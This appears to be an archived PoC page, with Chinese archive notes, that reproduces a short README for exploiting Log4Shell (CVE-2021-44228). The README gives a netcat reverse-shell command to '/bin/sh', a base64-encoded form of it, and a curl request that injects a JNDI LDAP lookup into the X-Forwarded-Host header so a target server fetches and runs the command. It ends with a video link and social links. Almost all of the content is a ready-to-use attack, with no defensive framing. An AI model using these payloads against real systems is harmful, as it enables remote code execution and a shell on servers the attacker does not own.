关联漏洞
描述
Log4jshell - CVE-2021-44228
介绍
# log4jshell_CVE-2021-44228
Log4jshell - CVE-2021-44228
#### Netcat
nc [Public IP] [Port] -e /bin/sh
#### Convert into Base64
bmMgMy4xMD.....wMyA4ODg4IC1lIC9iaW4vc2g=
#### Payload
curl [Target Website] -H "X-Forwarded-Host: ${jndi:ldap://[ReverseshellIP]:[Port]/Basic/Command/Base64/[Payload in base64]
#### Proof of concept
[Log4j PoC](https://youtu.be/3AxSFqX4WCs)
### Follow
#### [Youtube](https://www.youtube.com/c/vulnmachines)
#### [Twitter](https://www.twiiter.com/vulnmachines)
#### [Telegram](https://t.me/vulnmachines)
#### [Vulnmachines.com](https://www.vulnmachines.com)
#### [LinkedIn](https://www.linkedin.com/company/vulnmachines/)
文件快照
[4.0K] /data/pocs/278c2efa989d37ff3c4532f80b40fe38d1d2f101
└── [ 656] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。